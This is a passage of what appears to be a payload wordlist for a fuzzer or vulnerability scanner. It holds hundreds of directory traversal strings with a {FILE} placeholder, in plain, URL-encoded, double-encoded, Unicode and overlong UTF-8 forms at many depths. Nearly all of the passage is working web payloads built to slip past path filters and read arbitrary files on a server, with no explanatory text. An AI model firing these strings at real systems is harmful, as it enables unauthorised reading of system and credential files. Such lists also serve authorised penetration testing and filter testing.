","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%5c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","\\../{FILE}","\\../\\../{FILE}","\\../\\../\\../{FILE}","\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../\\../{FILE}","/..\\{FILE}","/..\\/..\\{FILE}","/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",".../{FILE}",".../.../{FILE}",".../.../.../{FILE}",".../.../.../.../{FILE}",".../.../.../.../.../{FILE}",".../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../.../{FILE}","...\\{FILE}","...\\...\\{FILE}","...\\...\\...\\{FILE}","...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\...\\{FILE}","..../{FILE}","..../..../{FILE}","..../..../..../{FILE}","..../..../..../..../{FILE}","..../..../..../..../..../{FILE}","..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../..../{FILE}","....\\{FILE}","....\\....\\{FILE}","....\\....\\....\\{FILE}","....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\....\\{FILE}","........................................................................../{FILE}","........................................................................../../{FILE}","........................................................................../../../{FILE}","........................................................................../../../../{FILE}","........................................................................../../../../../{FILE}","........................................................................../../../../../../{FILE}","........................................................................../../../../../../../{FILE}","........................................................................../../../../../../../../{FILE}","..........................................................................\\{FILE}","..........................................................................\\..\\{FILE}","..........................................................................\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%u2215{FILE}","..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","..%u2216{FILE}","..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%uEFC8{FILE}","..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uF025{FILE}","..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","..0x2f{FILE}","..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","..0x5c{FILE}","..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","..%c0%2f{FILE}","..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","..%c0%5c{FILE}","..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././